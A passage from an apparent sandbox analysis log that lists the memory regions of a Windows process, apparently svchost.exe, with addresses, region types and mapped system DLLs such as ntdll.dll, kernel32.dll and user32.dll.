1517 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1518 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1519 start_va = 0x7ff6bac60000 end_va = 0x7ff6bac6cfff monitored = 0 entry_point = 0x7ff6bac63980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1520 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1521 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1522 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1523 start_va = 0x560000 end_va = 0x566fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1524 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1525 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1526 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1527 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1528 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1529 start_va = 0x120000 end_va = 0x1ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1530 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1531 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1532 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1533 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1534 start_va = 0x180000000 end_va = 0x180081fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 1535 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1536 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1537 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1538 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1539 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1540 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1541 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1542 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1543 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1544 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1545 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1546 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1547 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1548 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1549 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1550 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1551 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1552 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1553 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1554 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1555 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1556 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1557 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1558 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1559 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1560 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1561 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1562 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1563 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1564 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1565 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1566 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1567 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1568 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1569 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1570 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1571 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1572 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1573 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1574 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1575 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1576 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1577 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1578 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1579 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1580 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1581 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1582 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1583 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1584 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1585 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1586 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1587 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1588 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1589 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1590 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1591 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1592 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1593 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1594 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1595 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1596 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1597 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1598 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1599 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1600 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1601 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1602 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1603 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1604 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1605 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1606 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1607 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1608 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1609 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1610 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1611 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1612 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1613 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1614 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1615 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1616 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1617 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1618 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1619 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1620 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1621 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1622 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1623 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1624 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1625 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1626 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1627 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1628 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1629 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1630 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1631 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1632 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1633 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1634 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1635 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1636 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1637 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1638 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1639 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1640 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1641 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1642 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1643 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1644 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1645 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1646 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1647 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1648 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1649 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1650 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1651 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1652 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1653 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1654 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1655 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1656 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1657 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1658 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1659 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1660 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1661 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1662 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1663 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1664 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1665 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1666 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1667 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1668 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1669 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1670 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1671 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1672 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1673 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1674 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1675 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1676 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1677 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1678 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1679 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1680 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1681 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1682 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1683 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1684 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1685 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1686 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1687 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1688 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1689 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1690 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1691 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1692 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1693 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1694 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1695 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1696 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1697 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1698 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1699 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1700 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1701 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1702 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1703 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1704 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1705 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1706 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1707 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1708 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1709 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1710 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1711 start_va = 0x480000 end_va = 0x4b8fff monitored = 0 entry_point = 0x4812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1712 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1713 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = 